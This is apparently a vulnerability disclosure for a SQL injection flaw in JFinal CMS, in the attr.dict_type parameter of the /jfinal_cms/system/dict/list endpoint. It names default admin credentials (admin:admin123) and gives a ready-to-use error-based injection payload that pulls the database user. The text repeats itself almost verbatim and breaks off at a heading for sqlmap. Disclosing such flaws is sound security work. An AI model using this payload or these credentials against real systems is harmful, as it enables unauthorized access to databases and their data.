The vulnerability appears in lines 23-28 of the com.jflyfox.system.dict.DictController.java
The attrVal parameter is the attr.dict_type parameter passed from the front end
So you can construct payload to exploit this vulnerability
Exploit
Maven Startup Environment
Vulnerability address: /jfinal_cms/system/dict/list
Administrator login is required. The default account password is admin:admin123
Injection parameters: attr.dict_type
payload:' OR (SELECT 2896 FROM(SELECT COUNT(*),CONCAT(0x717a7a6271efbd9e,(SELECT (ELT(2896=2896,user()))),0xefbd9e7162707a7131,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--+
Vulnerability Analysis
The vulnerability appears in lines 23-28 of the com.jflyfox.system.dict.DictController.java
The attrVal parameter is the attr.dict_type parameter passed from the front end So you can construct payload to exploit this vulnerability
Exploit
Maven Startup Environment Vulnerability address: /jfinal_cms/system/dict/list Administrator login is required. The default account password is admin:admin123
Injection parameters: attr.dict_type
payload:
' OR (SELECT 2896 FROM(SELECT COUNT(*),CONCAT(0x717a7a6271efbd9e,(SELECT (ELT(2896=2896,user()))),0xefbd9e7162707a7131,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--+Sqlmap: